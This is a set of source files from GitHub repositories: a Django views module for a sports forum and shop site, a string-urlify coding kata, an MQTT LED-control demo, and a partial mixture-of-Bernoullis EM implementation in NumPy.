HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user')) # TODO permitir apenas seller ter acesso a esta view\ndef delete_post(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if post.owner.user == request.user:\n post.delete()\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n\ndef client_check(user):\n return Client.objects.filter(user=user).exists()\n\n\ndef admin_check(user):\n return user.is_superuser or user.is_staff\n\n\ndef access_denied(request):\n return render(request, 'sports24h/accessdenied.html')\n\n\n@user_passes_test(seller_check, login_url=reverse_lazy('sports24h:access_denied'))\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef product(request):\n if not request.method == 'POST':\n forum_list = Forum.objects.order_by('-name')\n size_list = Size.objects.order_by('-name')\n context = {\n 'forum_list': forum_list,\n 'size_list': size_list\n }\n return render(request, 'sports24h/create_product.html', context)\n name = 
request.POST.get('name')\n    size = request.POST.get('size')\n    forum = request.POST.get('forum')\n    price = request.POST.get('price')\n    photo = request.FILES['photo']\n    if name and size and photo and forum and price:\n        seller = Seller.objects.get(user=request.user)\n        s = Size.objects.get(name=size)\n        f = Forum.objects.get(name=forum)\n        p = Product.objects.create(owner=seller, name=name, size=s, photo=photo, price=price, forum=f)\n        return HttpResponseRedirect(reverse('sports24h:index'))\n    else:\n        context = {\n            'error_message': \"Please, check if the fields are correctly filled.\",\n        }\n        return render(request, 'sports24h/product.html', context)\n\n\n@user_passes_test(seller_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef delete_product(request, product_id):\n    product = get_object_or_404(Product, id=product_id)\n    if product.owner.user == request.user:\n        product.delete()\n    return HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef follow_user(request):\n    if request.method == 'POST':\n        user_id = request.POST.get('user_id')\n        user = User.objects.get(id=user_id)\n        follows, created = Follows.objects.get_or_create(following_user=request.user, followed_user=user)\n        if created:\n            follows.save()\n        return redirect('sports24h:search_users')\n    else:\n        return redirect('sports24h:search_users')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef search_users(request):\n    if not request.method == 'POST':\n        followed_user_ids = Follows.objects.filter(\n            following_user=request.user\n        ).values_list('followed_user__id', flat=True)\n        followed_users = User.objects.filter(\n            id__in=followed_user_ids\n        )\n        context = {\n            'followed_users': followed_users\n        }\n\n        return render(request, 'sports24h/search_users.html', context)\n    search_query = request.POST.get('search_query')\n    followed_user_ids = Follows.objects.filter(\n        following_user=request.user\n    ).values_list('followed_user__id', flat=True)\n\n    # filter the search results to exclude followed users\n    users = User.objects.filter(\n        username__icontains=search_query\n    ).exclude(\n        id=request.user.id\n    ).exclude(\n        id__in=followed_user_ids\n    )\n\n    # get the list of User objects of the followed users\n    followed_users = User.objects.filter(\n        id__in=followed_user_ids\n    )\n\n    context = {\n        'users': users,\n        'followed_users': followed_users\n    }\n    return render(request, 'sports24h/search_users.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef unfollow_user(request):\n    user_id = request.POST.get('user_id')\n    followed_user = get_object_or_404(User, id=user_id)\n    if user_id is not None:\n        follow = Follows.objects.get(following_user=request.user, followed_user=followed_user)\n        follow.delete()\n    return redirect('sports24h:search_users')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef product_detail(request, product_id):\n    product = get_object_or_404(Product, pk=product_id)\n    is_owner = Seller.objects.filter(user=request.user).exists()\n    average_rating = Review.objects.filter(product=product).aggregate(Avg('rating'))['rating__avg']\n    context = {\n        'product': product,\n        'is_owner': is_owner,\n        'average_rating': average_rating\n    }\n    return render(request, 'sports24h/product_detail.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef post_detail(request, post_id):\n    post = get_object_or_404(Post.objects.select_related('owner__user'), pk=post_id)\n    comments = 
Comment.objects.filter(post=post)\n    is_owner = Seller.objects.filter(user=request.user).exists()\n    context = {\n        'post': post,\n        'comments': comments,\n        'is_owner': is_owner\n    }\n    return render(request, 'sports24h/post_detail.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef add_comment(request):\n    if request.method == 'POST':\n        comment_text = request.POST.get(\"comment_text\")\n        post_id = request.POST.get(\"post_id\")\n        post = Post.objects.get(pk=post_id)\n        # str has no .contains method; use the `in` membership test\n        if 'ola' in comment_text or 'adeus' in comment_text or 'aqui' in comment_text:\n            context = {\n                'error_message': \"Please, check if the fields are correctly filled.\",\n            }\n            return render(request, 'sports24h/accessdenied.html', context)\n\n        Comment.objects.create(user=request.user, post=post, text=comment_text)\n        return redirect('sports24h:post_detail', post_id=post_id)\n    else:\n        return redirect('sports24h:index')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef size(request):\n    if not request.method == 'POST':\n        return render(request, 'sports24h/create_size.html')\n    name = request.POST.get('name')\n    if name:\n        s = Size(name=name)\n        s.save()\n        return HttpResponseRedirect(reverse('sports24h:index'))\n    else:\n        context = {\n            'error_message': \"Please, check if the fields are correctly filled.\",\n        }\n        return render(request, 'sports24h/create_size.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef sport(request):\n    if not request.method == 'POST':\n        return render(request, 'sports24h/create_sport.html')\n    name = request.POST.get('name')\n    if name:\n        s = Sport(name=name)\n        s.save()\n        return HttpResponseRedirect(reverse('sports24h:index'))\n    else:\n        context = {\n            'error_message': \"Please, check if the fields are correctly filled.\",\n        }\n        return render(request, 'sports24h/create_sport.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef country(request):\n    if not request.method == 'POST':\n        return render(request, 'sports24h/create_country.html')\n    name = request.POST.get('name')\n    if name:\n        c = Country(name=name)\n        c.save()\n        return HttpResponseRedirect(reverse('sports24h:index'))\n    else:\n        context = {\n            'error_message': \"Please, check if the fields are correctly filled.\",\n        }\n        return render(request, 'sports24h/create_country.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef team(request):\n    if not request.method == 'POST':\n        context = {\n            'country_list': Country.objects.all,\n        }\n        return render(request, 'sports24h/create_team.html', context)\n    name = request.POST.get('name')\n    country = request.POST.get('countries')\n    if name and country:\n        t = Team(name=name, country=country)\n        t.save()\n        return HttpResponseRedirect(reverse('sports24h:index'))\n    else:\n        context = {\n            'error_message': \"Please, check if the fields are correctly filled.\",\n            'country_list': Country.objects.all,\n        }\n        return render(request, 'sports24h/create_team.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef forums_index(request):\n    user_followed_forums = request.user.followsforum_set.all().values_list('forum__id', flat=True)\n    forum_list = Forum.objects.exclude(id__in=user_followed_forums).order_by('-name')\n    followed_forums = Forum.objects.filter(id__in=user_followed_forums).order_by('-name')\n    context = {\n        'forums': forum_list,\n        'followed_forums': followed_forums,\n    }\n    return render(request, 
'sports24h/forums_index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef follow_forum(request):\n if not request.method == 'POST':\n return forums_index(request)\n\n forum_id = request.POST.get('forum_id')\n forum = get_object_or_404(Forum, pk=forum_id)\n follow = FollowsForum.objects.create(user=request.user, forum=forum)\n return forums_index(request)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef unfollow_forum(request):\n if not request.method == 'POST':\n return forums_index(request)\n\n forum_id = request.POST.get('forum_id')\n forum = get_object_or_404(Forum, pk=forum_id)\n follow = FollowsForum.objects.get(user=request.user, forum=forum)\n follow.delete()\n return forums_index(request)\n\n\ndef forum(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/create_forum.html')\n name = request.POST.get('forum_name')\n genre = request.POST.get('genre')\n if name and genre:\n Forum.objects.create(name=name, genre=genre)\n return HttpResponseRedirect(reverse('sports24h:forums_index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/create_forum.html', context=context)\n\n\ndef register_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/register.html')\n passwd = request.POST.get('password')\n confirm_passwd = request.POST.get('confirm_password')\n\n if passwd != confirm_passwd:\n context = {\n 'error_message': \"Passwords don't match\",\n }\n return render(request, 'sports24h/register.html', context=context)\n username = request.POST.get('username')\n user_type = request.POST.get('user_type')\n email = request.POST.get('email')\n passwd = request.POST.get('password')\n birthdate_str = request.POST.get('birthdate')\n\n # Check if any of the required fields are empty\n if not (username and user_type and email and passwd and birthdate_str):\n context = {\n 'error_message': \"Please, fill all the fields.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n if User.objects.filter(username=username).exists():\n context = {\n 'error_message': \"The username is already in use! 
Please, choose another one.\",\n }\n return render(request, 'sports24h/register.html', context)\n\n try:\n validate_email(email)\n except ValidationError:\n # Invalid email format\n context = {\n 'error_message': \"Please introduce a valid e-mail.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n if len(passwd) < 8:\n # Password is too short\n context = {\n 'error_message': \"Password should have at least 8 characters.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n birthdate = date.fromisoformat(birthdate_str)\n if (date.today() - birthdate).days < 365 * 18:\n # User is not yet 18 years old\n context = {\n 'error_message': \"You must be 18 years or older.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n u = User.objects.create_user(username=username, email=email, password=passwd)\n\n if user_type == 'client':\n Client.objects.create(user=u, birthdate=birthdate)\n elif user_type == 'seller':\n Seller.objects.create(user=u, birthdate=birthdate)\n return HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\ndef login_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/login.html')\n username = request.POST['username']\n passwd = request.POST['password']\n\n if username and passwd:\n user = authenticate(username=username, password=passwd)\n\n if user is not None:\n # user exists\n login(request, user)\n if hasattr(request.user, 'client'):\n request.session['photo'] = request.user.client.photo.url\n elif hasattr(request.user, 'seller'):\n request.session['photo'] = request.user.seller.photo.url\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n # user doesn't exist\n context = {\n 'error_message': \"The username doesn't exist in the database!\",\n }\n return render(request, 'sports24h/login.html', context)\n\n\ndef logout_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/logout.html')\n logout(request)\n request.session.flush()\n return HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef profile(request):\n if not request.method == 'POST':\n if hasattr(request.user, 'client'):\n c = Client.objects.get(user=request.user)\n\n elif hasattr(request.user, 'seller'):\n c = Seller.objects.get(user=request.user)\n followers_count = Follows.objects.filter(followed_user=request.user).count()\n context = {\n 'nr_followers': followers_count,\n 'c': c,\n 'countries': Country.objects.all(),\n 'teams': Team.objects.all(),\n 'sports': Sport.objects.all()\n }\n return render(request, 'sports24h/profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef other_user_profile(request, user_id):\n user_information = None\n try:\n user = User.objects.get(pk=user_id)\n if hasattr(user, 'client'):\n user_information = Client.objects.get(user=user)\n elif hasattr(user, 'seller'):\n user_information = Seller.objects.get(user=user)\n except User.DoesNotExist:\n raise Http404(\"User does not exist\")\n followers_count = Follows.objects.filter(followed_user=user).count()\n context = {\n 'user': user,\n 'user_information': user_information,\n 'nr_followers': followers_count\n }\n return render(request, 'sports24h/other_user_profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef delete_account(request):\n request.user.delete()\n return 
HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_country(request):\n    if request.method == 'POST':\n        country = request.POST.get('country')\n        if hasattr(request.user, 'client'):\n            c = Client.objects.get(user=request.user)\n        elif hasattr(request.user, 'seller'):\n            c = Seller.objects.get(user=request.user)\n        if country:\n            country, created = Country.objects.get_or_create(name=country)\n            c.country = country\n            c.save()\n            return redirect('sports24h:profile')\n    return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_favoriteTeam(request):\n    if request.method == 'POST':\n        teamCountry = request.POST.get('teamCountry')\n        teamName = request.POST.get('teamName')\n        if hasattr(request.user, 'client'):\n            c = Client.objects.get(user=request.user)\n        elif hasattr(request.user, 'seller'):\n            c = Seller.objects.get(user=request.user)\n        else:\n            return render(request, 'sports24h/profile.html',\n                          {'set_profile_setting': \"Error trying to change the profile\"})\n        if teamCountry and teamName:\n            country, created = Country.objects.get_or_create(name=teamCountry)\n            if created:\n                country.save()\n            team, created = Team.objects.get_or_create(name=teamName, country=country)\n            if created:\n                team.save()\n            c.favorite_team = team\n            c.save()\n            return redirect('sports24h:profile')\n\n    return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_favoriteSport(request):\n    if request.method == 'POST':\n        sportName = request.POST.get('sportName')\n        if hasattr(request.user, 'client'):\n            c = Client.objects.get(user=request.user)\n        elif hasattr(request.user, 'seller'):\n            c = Seller.objects.get(user=request.user)\n        else:\n            return redirect('sports24h:profile')\n        if sportName:\n            sport, created = Sport.objects.get_or_create(name=sportName)\n            if created:\n                sport.save()\n            c.favorite_sport = sport\n            c.save()\n            request.user = c\n            return redirect('sports24h:profile')\n\n    return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef upload_photo(request):\n    if request.method == 'POST' and len(request.FILES) == 0:\n        return render(request, 'sports24h/profile.html',\n                      {'uploaded_file_status': \"Please select a photo\"})\n    if request.method == 'POST' and request.FILES['myfile']:\n        myfile = request.FILES['myfile']\n        # bind the same name in both branches so the context below is always defined\n        if Client.objects.filter(user=request.user).exists():\n            c = Client.objects.get(user=request.user)\n        elif Seller.objects.filter(user=request.user).exists():\n            c = Seller.objects.get(user=request.user)\n        c.photo.save(myfile.name, myfile)\n        c.save()\n        request.session['photo'] = c.photo.url\n\n        followers_count = Follows.objects.filter(followed_user=request.user).count()\n        context = {\n            'nr_followers': followers_count,\n            'c': c,\n            'countries': Country.objects.all(),\n            'teams': Team.objects.all(),\n            'sports': Sport.objects.all(),\n            'uploaded_file_status': \"Photo updated successfully\"\n        }\n        return render(request, 'sports24h/profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef reset_photo(request):\n    user = request.user\n    default_photo_path = '/sports24h/static/media/users/default-user-icon.png'\n    if hasattr(user, 'client'):\n        request.session['photo'] = default_photo_path\n        user.client.save()\n    elif hasattr(user, 'seller'):\n        request.session['photo'] = default_photo_path\n        
user.seller.save()\n    return render(request, 'sports24h/profile.html',\n                  {'uploaded_file_status': \"Photo removed successfully\"})\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef shopping_cart(request):\n    if request.method != \"POST\":\n        try:\n            client = Client.objects.get(user=request.user)\n            cart = ShoppingCart.objects.get(client=client)\n            cart_items = cart.product_list.all()\n        except ObjectDoesNotExist:\n            cart_items = []\n\n        context = {\n            'cart_items': cart_items,\n        }\n        return render(request, 'sports24h/shopping_cart.html', context)\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef buy_products(request):\n    if request.method == \"POST\":\n        client = request.user.client\n        shopping_cart = ShoppingCart.objects.get(client=client)\n        products = shopping_cart.product_list.all()\n        bought_products, _ = BoughtProducts.objects.get_or_create(client=client)\n        bought_products.product_list.add(*products)\n        shopping_cart.product_list.clear()\n        return redirect('sports24h:bough_products')\n    # non-POST requests used to fall through and return None\n    return redirect('sports24h:bough_products')\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef add_review(request, product_id):\n    rating = request.POST.get('rating_value')\n    if not rating:\n        return redirect('sports24h:bough_products')\n    product = Product.objects.get(id=product_id)\n    client = request.user.client\n    # create() already persists the review; no extra save() needed\n    Review.objects.create(\n        client=client,\n        product=product,\n        rating=rating,\n    )\n    return redirect('sports24h:bough_products')\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef bough_products(request):\n    if request.method != \"POST\":\n        client = request.user.client\n        bought_products = BoughtProducts.objects.filter(client=client)\n\n        if bought_products.exists():\n            products = bought_products.first().product_list.all()\n            product_ids = list(products.values_list('id', flat=True))\n            reviewed_products = Product.objects.filter(review__client=client, id__in=product_ids).distinct()\n            unreviewed_products = Product.objects.filter(\n                ~Q(review__client=client),\n                id__in=product_ids\n            ).distinct()\n        else:\n            reviewed_products = Product.objects.none()\n            unreviewed_products = Product.objects.none()\n\n        context = {\n            'reviewed_products': reviewed_products,\n            'unreviewed_products': unreviewed_products,\n        }\n        return render(request, 'sports24h/bough_products.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef seller_products(request):\n    sp_items = Product.objects.filter(owner__user=request.user)\n\n    context = {\n        'sp_items': sp_items,\n    }\n    return render(request, 'sports24h/seller_products.html', context)\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))  # TODO: make this reachable only by users with the client role\ndef add_to_cart(request, product_id):\n    if not hasattr(request.user, 'client'):\n        return HttpResponseRedirect(reverse('sports24h:index'))\n\n    client = Client.objects.get(user=request.user)\n    try:\n        shopping_cart = ShoppingCart.objects.get(client=client)\n    except ObjectDoesNotExist:\n        shopping_cart = ShoppingCart.objects.create(client=client)\n\n    product = Product.objects.get(id=product_id)\n    shopping_cart.product_list.add(product)\n\n    return HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@user_passes_test(client_check)\ndef remove_from_cart(request, product_id):\n    client = Client.objects.get(user=request.user)\n    shopping_cart = 
ShoppingCart.objects.get(client=client)\n    product = Product.objects.get(id=product_id)\n    shopping_cart.product_list.remove(product)\n\n    return HttpResponseRedirect(reverse('sports24h:shopping_cart'))\n\n\ndef send_message_html(request):\n    messages_list = Message.objects.filter(recipient=request.user).order_by('-sent_at')\n    paginator = Paginator(messages_list, 10)  # Show 10 messages per page\n\n    page = request.GET.get('page')\n    try:\n        messages = paginator.page(page)\n    except PageNotAnInteger:\n        messages = paginator.page(1)\n    except EmptyPage:\n        messages = paginator.page(paginator.num_pages)\n\n    return render(request, 'sports24h/send_message.html', {'messages': messages})\n\n\ndef sent_messages_html(request):\n    messages_list = Message.objects.filter(sender=request.user).order_by('-sent_at')\n    paginator = Paginator(messages_list, 10)  # Show 10 messages per page\n\n    page = request.GET.get('page')\n    try:\n        messages = paginator.page(page)\n    except PageNotAnInteger:\n        messages = paginator.page(1)\n    except EmptyPage:\n        messages = paginator.page(paginator.num_pages)\n\n    return render(request, 'sports24h/sent_messages.html', {'messages': messages})\n\n\ndef about_index(request):\n    return render(request, 'sports24h/about.html')\n\n\ndef inbox(request):\n    messages = Message.objects.filter(recipient=request.user).order_by('-sent_at')\n    return render(request, 'sports24h/send_message.html', {'messages': messages})\n\n\ndef send_message_submit(request):\n    if request.method == 'POST':\n        recipient_username = request.POST['recipient']\n        content = request.POST['message']\n\n        try:\n            recipient = User.objects.get(username=recipient_username)\n            message = Message(sender=request.user, recipient=recipient, content=content)\n            message.save()\n            return redirect('sports24h:index')\n        except User.DoesNotExist:\n            return render(request, 'sports24h/send_message.html', {'error': 'Recipient not found'})\n\n    return render(request, 'sports24h/send_message.html')\n\n\n@user_passes_test(client_check)\ndef like(request, post_id):\n    post = Post.objects.get(pk=post_id)\n    try:\n        like = Likes.objects.get(user=request.user, post=post)\n        like.delete()\n        post.likes_count -= 1\n    except ObjectDoesNotExist:\n        Likes.objects.create(user=request.user, post=post)\n        post.likes_count += 1\n    post.save()\n    return redirect(request.META['HTTP_REFERER'])\n\n\n@user_passes_test(lambda u: u.is_superuser, login_url=reverse_lazy('sports24h:login_user'))\ndef admin(request):\n    return render(request, 'sports24h/admin_options.html')\n\n\n#### VIEWS REACT\n@api_view(['GET', 'POST'])  # (3)\ndef post_list(request):\n    if request.method == 'GET':  # (4)\n        posts = Post.objects.all()\n        serializerP = PostSerializer(posts, context={'request': request}, many=True)\n        return Response(serializerP.data)\n    elif request.method == 'POST':  # (4)\n        serializer = PostSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(status=status.HTTP_201_CREATED)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT', 'DELETE'])\ndef post_edita(request, pk):\n    try:\n        post = Post.objects.get(pk=pk)\n    except Post.DoesNotExist:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n    if request.method == 'PUT':\n        serializer = PostSerializer(post, data=request.data, context={'request': request})\n        if serializer.is_valid():\n            serializer.save()\n            return Response(status=status.HTTP_204_NO_CONTENT)\n        return Response(serializer.errors,\n                        status=status.HTTP_400_BAD_REQUEST)\n    elif request.method == 'DELETE':\n        
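# (added comment) DELETE has no body to validate: drop the post and answer 204\n        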
post.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'POST']) # (3)\ndef comment_list(request):\n if request.method == 'GET': # (4)\n comments = Comment.objects.all()\n serializerC = CommentSerializer(comments, context={'request': request}, many=True)\n return Response(serializerC.data)\n elif request.method == 'POST': # (4)\n serializer = CommentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"diogocardoso777/projeto_DIAM","sub_path":"sitediam/sports24h/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":32374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32053615464","text":"\"\"\"\nReplace spaces with %20 (in place)\n\"\"\"\n\ndef urlify(source):\n \"\"\"\n >>> urlify('ab c ')\n 'ab%20c'\n >>> urlify(' b a ')\n '%20b%20%20a'\n \"\"\"\n source = list(source)\n read = write = len(source) - 1\n\n # Find last letter\n while source[read] == ' ':\n read -= 1\n \n while read >= 0:\n item = source[read]\n if item != ' ':\n source[write] = item\n write -= 1\n else:\n source[write] = '0'\n source[write - 1] = '2'\n source[write - 2] = '%'\n write -= 3\n read -= 1\n\n return ''.join(source)","repo_name":"graffic/katas","sub_path":"cracking_interview/ch1/q3_urlify.py","file_name":"q3_urlify.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11082679342","text":"\"\"\"\nDemo/test program for the MQTT utilities.\nSee https://github.com/sensemakersamsterdam/astroplant_explorer\n\"\"\"\n#\n# (c) Sensemakersams.org and others. See https://github.com/sensemakersamsterdam/astroplant_explorer\n# Author: Gijs Mos\n#\n# Warning: if import of ae_* modules fails, then you need to set up PYTHONPATH.\n# To test start python, import sys and type sys.path. The ae module directory\n# should be included.\n\nfrom ae_util.configuration import cfg\nfrom ae_util.mqtt import AE_Local_MQTT\nfrom ae_drivers import AE_Pin\nfrom ae_drivers.led import AE_LED\nfrom time import sleep\nimport sys\n#\n# Setup our local MQTT agent. Parameters are obtained from the ./configuration.json file.\nloc_mqtt = AE_Local_MQTT()\nloc_mqtt.setup()\n\nled = AE_LED('led', 'The red LED', AE_Pin.D20)\nled.setup()\n\nstop = False\n\n\ndef cb1(sub_topic, payload, rec_time):\n print('call_back 1:', sub_topic, payload, rec_time)\n if sub_topic == 'button1' and payload == 'True':\n print ('led on')\n led.value(1) \n elif sub_topic == 'button1' and payload == 'False':\n print ('led off')\n led.value(0)\n else:\n print ('not for me...')\n\ndef cb_stop(sub_topic, payload, rec_time):\n global stop\n print('Received stop request. 
mqtt_receiver_demo bailing out!')\n    stop = True\n\n# This led receiver listens to topic 'button1'\nloc_mqtt.subscribe('button1/#', cb1)\n\nloc_mqtt.subscribe('control/stop', cb_stop)\n\nprint('Abort with control-c to end prematurely.')\ntry:\n    while not stop:\n        sub_topic, payload, rec_time = loc_mqtt.get_message()\n        if sub_topic is not None:\n            print('Dequeued:', sub_topic, payload, rec_time)\n        sleep(0.1)\nexcept KeyboardInterrupt:\n    print('\\nManually aborted....\\nBye bye')\n","repo_name":"sensemakersamsterdam/astroplant_explorer","sub_path":"explorer/mqtt_demos/2_mqtt_led_receiver.py","file_name":"2_mqtt_led_receiver.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
+{"seq_id":"27294346237","text":"\nimport numpy as np\nimport pylab\nimport time\n\nimport util\n\nfrom scipy.special import gammaln\n\nIMAGE_DIM = 28\n\nTRAIN_IMAGES_FILE = 'train-images-idx3-ubyte'\nTRAIN_LABELS_FILE = 'train-labels-idx1-ubyte'\nTEST_IMAGES_FILE = 't10k-images-idx3-ubyte'\nTEST_LABELS_FILE = 't10k-labels-idx1-ubyte'\n\n\ndef beta_log_pdf_unnorm(theta, a, b):\n    \"\"\"Unnormalized log PDF of the beta distribution.\"\"\"\n    return (a - 1.) * np.log(theta) + (b - 1.) * np.log(1. - theta)\n\ndef dirichlet_log_pdf_unnorm(pi, a):\n    \"\"\"Unnormalized log PDF of the Dirichlet distribution.\"\"\"\n    return np.sum((a - 1.) * np.log(pi))\n\n\n\nclass Params(object):\n    \"\"\"A class which represents the trainable parameters of the mixture model.\n    - pi: the mixing proportions, represented as a K-dimensional array. It must be a\n      probability distribution, i.e. the entries must be nonnegative and sum to 1.\n    - theta: The Bernoulli parameters for each pixel in each mixture component. This is\n      a K x D matrix, where rows correspond to mixture components and columns correspond\n      to pixels. \"\"\"\n    \n    def __init__(self, pi, theta):\n        self.pi = pi\n        self.theta = theta\n\n    @classmethod  # required: this is called as Params.random_initialization(...)\n    def random_initialization(cls, num_components, num_pixels):\n        init_pi = np.ones(num_components) / num_components\n        init_theta = np.random.uniform(0.49, 0.51, size=(num_components, num_pixels))\n        return Params(init_pi, init_theta)\n\nclass Prior(object):\n    \"\"\"A class representing the priors over parameters in the mixture model.\n    - a_mix: A scalar valued parameter for the Dirichlet prior over mixing proportions.\n    - a_pixels and b_pixels: The scalar-valued parameters for the beta prior over the entries of\n      theta. I.e., the entries of theta are assumed to be drawn i.i.d. from the distribution\n      Beta(a_pixels, b_pixels). \"\"\"\n    \n    def __init__(self, a_mix, a_pixels, b_pixels):\n        self.a_mix = a_mix\n        self.a_pixels = a_pixels\n        self.b_pixels = b_pixels\n\n    @classmethod  # required: this is called as Prior.default_prior()\n    def default_prior(cls):\n        \"\"\"Return a Prior instance which has reasonable values.\"\"\"\n        return cls(2., 2., 2.)\n\n    @classmethod\n    def uniform_prior(cls):\n        \"\"\"Return a set of prior parameters which corresponds to a uniform distribution. Then\n        MAP estimation is equivalent to maximum likelihood.\"\"\"\n        return cls(1., 1., 1.)\n\nclass Model(object):\n    \"\"\"A class implementing the mixture of Bernoullis model. 
The fields are:\n - prior: an Prior instance\n - params: a Params instance\"\"\"\n \n def __init__(self, prior, params):\n self.prior = prior\n self.params = params\n\n @classmethod\n def random_initialization(cls, prior, num_components, num_pixels):\n params = Params.random_initialization(num_components, num_pixels)\n return cls(prior, params)\n\n def expected_joint_log_probability(self, X, R):\n \"\"\"Compute the expected joint log probability, where the expectation is with respect to\n the responsibilities R. This is the objective function being maximized in the M-step.\n It's useful for verifying the optimality conditions in the M-step.\"\"\"\n \n total = 0.\n\n # Prior over mixing proportions\n total += dirichlet_log_pdf_unnorm(self.params.pi, self.prior.a_mix)\n\n # Prior over pixel probabilities\n total += np.sum(beta_log_pdf_unnorm(self.params.theta, self.prior.a_pixels, self.prior.b_pixels))\n\n # Probability of assignments\n total += np.sum(R * np.log(self.params.pi))\n \n # Matrix of log probabilities of observations conditioned on z\n # The (i, k) entry is p(x^(i) | z^(i) = k)\n log_p_x_given_z = np.dot(X, np.log(self.params.theta).T) + \\\n np.dot(1. - X, np.log(1. - self.params.theta).T)\n\n # Observation probabilities\n total += np.sum(R * log_p_x_given_z)\n\n return total\n\n def log_likelihood(self, X):\n \"\"\"Compute the log-likelihood of the observed data, i.e. the log probability with the\n latent variables marginalized out.\"\"\"\n \n # Matrix of log probabilities of observations conditioned on z\n # The (i, k) entry is p(x^(i) | z^(i) = k)\n log_p_x_given_z = np.dot(X, np.log(self.params.theta).T) + \\\n np.dot(1. - X, np.log(1. - self.params.theta).T)\n log_p_z_x = log_p_x_given_z + np.log(self.params.pi)\n\n # This is a numerically stable way to compute np.log(np.sum(np.exp(log_p_z_x), axis=1))\n log_p_x = np.logaddexp.reduce(log_p_z_x, axis=1)\n\n return log_p_x.sum()\n\n def update_pi(self, R):\n \"\"\"Compute the update for the mixing proportions in the M-step of the E-M algorithm.\"\"\"\n\n # implementing formulae for update_pi\n R_k_plus_1_times_alpha_minus_1 = (R.sum(axis=0) + 1) * (self.prior.a_mix - 1)\n \n pi_updated = R_k_plus_1_times_alpha_minus_1 / R_k_plus_1_times_alpha_minus_1.sum()\n \n return pi_updated\n \n \n def update_theta(self, X, R):\n \"\"\"Compute the update for the Bernoulli parameters in the M-step of the E-M algorithm.\"\"\"\n\n # implementing formulae for update_theta \n \n R_times_X = np.dot(np.transpose(R),X)\n R_times_1_minus_X = np.dot(np.transpose(R), 1 - X)\n term_a = R_times_X + self.prior.a_pixels - 1\n term_b = R_times_1_minus_X + self.prior.b_pixels - 1\n theta = term_a / (term_a + term_b)\n \n return theta\n\n\t\t\n def compute_posterior(self, X, M=None):\n \"\"\"Compute the posterior probabilities of the cluster assignments given the observations.\n This is used to compute the E-step of the E-M algorithm. It's also used in computing the\n posterior predictive distribution when making inferences about the hidden part of the image.\n It takes an optional parameter M, which is a binary matrix the same size as X, and determines\n which pixels are observed. (1 means observed, and 0 means unobserved.) 
